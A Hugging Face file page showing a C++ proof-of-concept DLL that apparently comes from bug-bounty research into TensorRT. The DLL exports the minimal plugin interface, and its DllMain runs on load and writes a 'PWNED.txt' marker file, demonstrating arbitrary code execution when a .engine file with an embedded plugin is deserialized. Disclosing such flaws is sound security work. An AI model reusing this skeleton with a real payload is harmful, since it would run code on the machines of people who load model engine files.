Hugging Face's logo

treforbenbow
/
tensorrt-ace-poc-embedded-plugin

Model card Files
xet
 Community
tensorrt-ace-poc-embedded-plugin
File size: 2,386 Bytes
953fdb6
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
// Malicious TensorRT Plugin PoC - Proof of Concept for ACE via embedded plugin in .engine file
// This DLL exports the minimal required TensorRT plugin interface functions.
// When loaded by TensorRT during engine deserialization, DllMain executes arbitrary code.

#include <windows.h>
#include <cstdint>
#include <cstdio>

// Forward declarations - minimal TensorRT interfaces needed for plugin exports.
// We don't need full headers; just enough for the function signatures.
namespace nvinfer1 {
    class ILoggerFinder;
    class IPluginCreator;
}

// ============================================================================
// PROOF OF CONCEPT: DllMain executes when TensorRT loads the embedded DLL
// ============================================================================
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    if (ul_reason_for_call == DLL_PROCESS_ATTACH)
    {
        // PROOF OF CONCEPT: Write a file to prove arbitrary code execution
        FILE* f = fopen("C:\\Users\\Trefor\\bug bounty\\TensorRT\\poc\\PWNED.txt", "w");
        if (f)
        {
            fprintf(f, "ARBITRARY CODE EXECUTION ACHIEVED!\n");
            fprintf(f, "This file was created by a malicious TensorRT plugin\n");
            fprintf(f, "embedded in a .engine file during deserialization.\n");
            fprintf(f, "No engine_host_code_allowed flag was set.\n");
            fclose(f);
        }

        // Removed MessageBox to avoid blocking during testing
    }
    return TRUE;
}

// ============================================================================
// Required TensorRT plugin library exports
// ============================================================================

// setLoggerFinder - required by TensorRT plugin loading
extern "C" __declspec(dllexport) void setLoggerFinder(nvinfer1::ILoggerFinder* finder)
{
    // No-op - just needs to exist
    (void)finder;
}

// getCreators - required by TensorRT plugin loading (V3 API, checked first)
extern "C" __declspec(dllexport) nvinfer1::IPluginCreator* const* getCreators(int32_t& nbCreators)
{
    nbCreators = 0;
    return nullptr;
}

// getPluginCreators - fallback for older TensorRT versions (V2 API)
extern "C" __declspec(dllexport) nvinfer1::IPluginCreator* const* getPluginCreators(int32_t& nbCreators)
{
    nbCreators = 0;
    return nullptr;
}